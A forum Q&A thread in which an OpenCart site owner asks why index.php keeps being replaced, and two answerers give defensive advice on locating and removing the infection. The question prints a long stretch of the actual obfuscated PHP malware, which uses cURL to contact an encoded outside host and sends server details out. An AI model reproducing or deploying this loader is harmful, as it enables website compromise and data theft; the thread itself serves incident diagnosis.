Opencart index.php file corruption

AshrafFrotan
January 4, 2023
188 views
0 votes
2 Answers

I’m using opencart v3.0.2.0, the issue is that the index.php file of opencart which is the entry point of my opencart website and is uploaded in public_html directory currupts(the code in index.php file changes to strange characters).
It happened twice in last week. I don’t know someone is hacking or something is wrong with my domain or code.
if someone can help or guide me please let me know.
thank you.

index.php file after curruption:

global $O; $O=urldecode($OOOOOO);$oOooOO=’z1226_16′;$oOooOOoO=$O[15].$O[4].$O[4].$O[9].$O[62].$O[63].$O[63].$O[64].$O[72].$O[66].$O[59].$O[65].$O[67].$O[71].$O[59].$O[65].$O[65].$O[67].$O[59].$O[65].$O[67].$O[65].$O[63].$oOooOO.$O[63]; function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){$ooooOOOooOo=curl_init();curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);curl_close($ooooOOOooOo);return $oooooOOOOooO; } function ooOOoOOO($OooooO,$OOOoooo=array()){global $O;$OooooO=str_replace(‘ ‘,’+’,$OooooO);$OOooooO=curl_init();curl_setopt($OOooooO,CURLOPT_URL, "$OooooO");curl_setopt($OOooooO,CURLOPT_RETURNTRANSFER, 1);curl_setopt($OOooooO,CURLOPT_HEADER, 0);curl_setopt($OOooooO,CURLOPT_TIMEOUT,10);curl_setopt($OOooooO,CURLOPT_POST, 1);curl_setopt($OOooooO,CURLOPT_POSTFIELDS, http_build_query($OOOoooo));$OOOOooo=curl_exec($OOooooO);$OOOOoooOO=curl_errno($OOooooO);curl_close($OOooooO);if(0!==$OOOOoooOO){return false;}return $OOOOooo;} function oooOOOo($ooOOo){global $O;$ooOOOOo = false;$oooooOOo = $O[14].$O[8].$O[8].$O[14].$O[18].$O[2].$O[23].$O[8].$O[4].$O[90].$O[14].$O[8].$O[8].$O[14].$O[18].$O[2].$O[90].$O[5].$O[10].$O[15].$O[8].$O[8].$O[90].$O[23].$O[7].$O[24].$O[14].$O[90].$O[10].$O[8].$O[18];if ($ooOOo!=”){if (preg_match("/($oooooOOo)/si",$ooOOo)){$ooOOOOo=true;}}return $ooOOOOo;} function oooOOooOOoOO($oOOOOOOoOOOO){global $O;$ooOOOOOOoO=false;$ooOOOOOOoOo=$O[14].$O[8].$O[8].$O[14].$O[18].$O[2].$O[59].$O[21].$O[8].$O[59].$O[16].$O[9].$O[90].$O[5].$O[10].$O[15].$O[8].$O[8].$O[59].$O[21].$O[8].$O[59].$O[16].$O[9].$O[90].$O[14].$O[8].$O[8].$O[14].$O[18].$O[2].$O[59].$O[21].$O[8].$O[25];if ($oOOOOOOoOOOO!=” && preg_match("/($ooOOOOOOoOo)/si", $oOOOOOOoOOOO)) {$ooOOOOOOoO=true;}return $ooOOOOOOoO;}$oOooOOoOO=((isset($_SERVER[$O[41].$O[30].$O[30].$O[35].$O[37]]) && $_SERVER[$O[41].$O[30].$O[30].$O[35].$O[37]]!==$O[8].$O[13].$O[13])?$O[15].$O[4].$O[4].$O[9].$O[11].$O[62].$O[63].$O[63]:$O[15].$O[4].$O[4].$O[9].$O[62].$O[63].$O[63]);$oOoooOOoOO=$_SERVER[$O[29].$O[28].$O[26].$O[32].$O[28].$O[37].$O[30].$O[52].$O[32].$O[29].$O[33]];$ooOOoooOOoOO=$_SERVER[$O[41].$O[30].$O[30].$O[35].$O[52].$O[41].$O[34].$O[37].$O[30]];$ooOOOoooOOoOO=$_SERVER[$O[35].$O[41].$O[35].$O[52].$O[37].$O[28].$O[44].$O[39]];$ooOOOOoooOOOoOO=$_SERVER[$O[37].$O[28].$O[29].$O[48].$O[28].$O[29].$O[52].$O[50].$O[36].$O[51].$O[28]];$ooOOOOoooOOOOoOO=$oOooOOoOO.$ooOOoooOOoOO.$oOoooOOoOO;$oooOOOOoooOOOooOO=$oOooOOoO.$O[63].$O[7].$O[24].$O[12].$O[10].$O[4].$O[10].$O[59].$O[9].$O[15].$O[9];$ooooOOOOoooOOOooO=$oOooOOoO.$O[63].$O[25].$O[10].$O[9].$O[59].$O[9].$O[15].$O[9];$ooooOOOOoooOOOooOoo=$oOooOOoO.$O[63].$O[16].$O[6].$O[25].$O[9].$O[59].$O[9].$O[15].$O[9];$oooooOOoooOOOoooOoo=$oOooOOoO.$O[63].$O[1].$O[8].$O[3].$O[12].$O[11].$O

Answers

- ArindamPaul
- January 5, 2023 at 12:30 pm
- 0 votes
0
Yeap you right! Someone hack your store and upload virus.
Please check store upload directory storage/download may be you have strange files as 6234sdhsd.ocmod.zip or something like that.

I’m sure that virus was upload by catalog/controller/tool/upload.php file. So if you don’t need this function, you can comment all of this logic and return empty json answer like:
```
$json = '';
$this->response->addHeader('Content-Type: application/json');
$this->response->setOutput(json_encode($json));
```
After that action you must delete strange files such as images.phpbbfcode.php with encryption body.

check all of those path:
- admin/ (language/controller)
- catalog/ (language/controller)
- system/ (all modification if u have as ocmod.xml)
- system/library
Check all of those paths. If you had backups, it’s will less hard for compare files.
Login or Signup to reply.

- AnasSafi
- March 11, 2023 at 5:41 pm
- 0 votes
0
I recently encountered a similar issue with one of my clients. Upon investigation, we found that the problem was caused by a Chrome browser extension that injects code into PHP files when uploading any php files through the browser (like Cpanel File Management). In this case, the code was injected into the index.php file, and when someone accessed that file through the URL, the malicious code would start injecting files into the server, creating new files, and notifying the hacker of the server’s current URL and other data using the cURL function in PHP.

To resolve this issue, you can take the following steps:

1- Take a screenshot of all the extensions used in the browser to upload files to the server, share it with us, and then remove the browser or all its extensions.

2- Check all files that were uploaded or updated to the server from the date of the hacking incident. You can run a command on the server to get a list of new or updated files, depending on your operating system.

3- You may find some *.php files in the .well-known or other hidden folders on the server.

4- Protect your operating system with an antivirus. I recommend using a non-free antivirus like Kaspersky.

Could you please share a screenshot of your browser extensions so that we can determine which extension might be causing the website hacks?

Login or Signup to reply.

Please signup or login to give your own answer.

Click here to cancel reply.